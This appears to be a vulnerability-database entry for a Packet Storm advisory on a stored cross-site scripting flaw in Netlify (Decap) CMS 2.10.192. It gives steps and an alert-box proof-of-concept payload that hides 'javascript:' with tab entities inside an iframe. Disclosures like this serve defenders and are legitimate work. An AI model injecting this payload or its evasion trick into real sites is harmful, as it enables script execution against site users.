Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTmrswrrPACKETSTORM:173367
HistoryJul 11, 2023 - 12:00 a.m.

Netlify CMS 2.10.192 Cross Site Scripting

2023-07-1100:00:00
tmrswrr
packetstormsecurity.com
96
netlify cms
stored cross-site scripting
xss
decap cms
security vulnerability
JSON
`# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://decapcms.org/docs/intro/  
# Software Link: https://github.com/decaporg/decap-cms  
# Version: 2.10.192  
# Tested on: https://cms-demo.netlify.com  
  
  
Description:  
  
1. Go to new post and write body field your payload:  
  
https://cms-demo.netlify.com/#/collections/posts  
  
Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>  
  
2. After save it XSS payload will executed and see alert box  
`
JSON